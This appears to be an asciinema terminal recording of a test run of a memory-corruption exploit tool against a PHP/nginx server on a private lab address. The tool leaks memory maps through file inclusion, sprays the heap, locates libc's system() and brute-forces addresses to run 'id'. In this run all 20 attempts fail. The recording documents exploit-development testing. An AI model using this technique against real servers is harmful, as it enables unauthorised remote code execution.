{"version":3,"term":{"cols":80,"rows":24},"timestamp":1779313565,"command":"python3 tools/maps_only_bruteforce_exploit.py --target 192.168.1.205:19321 --cmd id --token x --marker /tmp/r --max-candidates 20 --progress-every 1 --proof-delay 0.05 --recovery-timeout 20 --time-budget 300","title":"maps-only Vagrant dense-sled smoke ptrace_scope=1","env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.044, "o", "target        192.168.1.205:19321\r\nprimitive     LFI maps/libc + marker proof; no /proc/<pid>/mem; no core parsing\r\nptrace rule   target OS ptrace policy is not changed by this tool\r\ncommand       id\r\n\r\n"]
[0.025, "o", "[*] profiling heap growth with 20 delayed /spray bodies\r\n"]
[0.645, "o", "php uid       65534\r\nmaster pid    3044\r\nworker pid    27115\r\nnginx rw      0x55e420b83000\r\nlibc base     0x7fca47a6d000\r\nsystem        0x7fca47abdd70 (offset 0x50d70)\r\n"]
[0.000, "o", "candidate ranges\r\n"]
[0.000, "o", "  0x55e421058000-0x55e4210db000 0x83000 [heap]\r\n  0x55e420ff3000-0x55e421058000 0x65000 [heap]\r\n\r\n"]
[0.000, "o", "cleanup sled  shared-command stride=32 phase=0 slots=123 command_offset=3954\r\n"]
[0.006, "o", "[*] address_mod=7 scanned=42104 safe_seen=20 selected=20\r\n"]
[0.000, "o", "    try=1 mod=7 addr=0x55e421062127 low=2721 rate=178.28/s\r\n"]
[1.265, "o", "    try=2 mod=7 addr=0x55e42106212f low=2f21 rate=1.57/s\r\n"]
[1.263, "o", "    try=3 mod=7 addr=0x55e421062137 low=3721 rate=1.18/s\r\n"]
[1.257, "o", "    try=4 mod=7 addr=0x55e421062147 low=4721 rate=1.06/s\r\n"]
[1.271, "o", "    try=5 mod=7 addr=0x55e42106214f low=4f21 rate=0.99/s\r\n"]
[1.266, "o", "    try=6 mod=7 addr=0x55e421062157 low=5721 rate=0.95/s\r\n"]
[1.265, "o", "    try=7 mod=7 addr=0x55e42106215f low=5f21 rate=0.92/s\r\n"]
[1.261, "o", "    try=8 mod=7 addr=0x55e421062167 low=6721 rate=0.90/s\r\n"]
[1.266, "o", "    try=9 mod=7 addr=0x55e42106216f low=6f21 rate=0.89/s\r\n"]
[1.268, "o", "    try=10 mod=7 addr=0x55e421062177 low=7721 rate=0.88/s\r\n"]
[1.263, "o", "    try=11 mod=7 addr=0x55e421062427 low=2724 rate=0.87/s\r\n"]
[1.267, "o", "    try=12 mod=7 addr=0x55e42106242f low=2f24 rate=0.86/s\r\n"]
[1.255, "o", "    try=13 mod=7 addr=0x55e421062437 low=3724 rate=0.86/s\r\n"]
[1.260, "o", "    try=14 mod=7 addr=0x55e421062447 low=4724 rate=0.85/s\r\n"]
[1.262, "o", "    try=15 mod=7 addr=0x55e42106244f low=4f24 rate=0.85/s\r\n"]
[1.251, "o", "    try=16 mod=7 addr=0x55e421062457 low=5724 rate=0.84/s\r\n"]
[1.259, "o", "    try=17 mod=7 addr=0x55e42106245f low=5f24 rate=0.84/s\r\n"]
[1.269, "o", "    try=18 mod=7 addr=0x55e421062467 low=6724 rate=0.84/s\r\n"]
[1.257, "o", "    try=19 mod=7 addr=0x55e42106246f low=6f24 rate=0.84/s\r\n"]
[1.251, "o", "    try=20 mod=7 addr=0x55e421062477 low=7724 rate=0.83/s\r\n"]
[1.266, "o", "[!] exhausted selected candidates without marker proof\r\n"]
[0.009, "x", "1"]
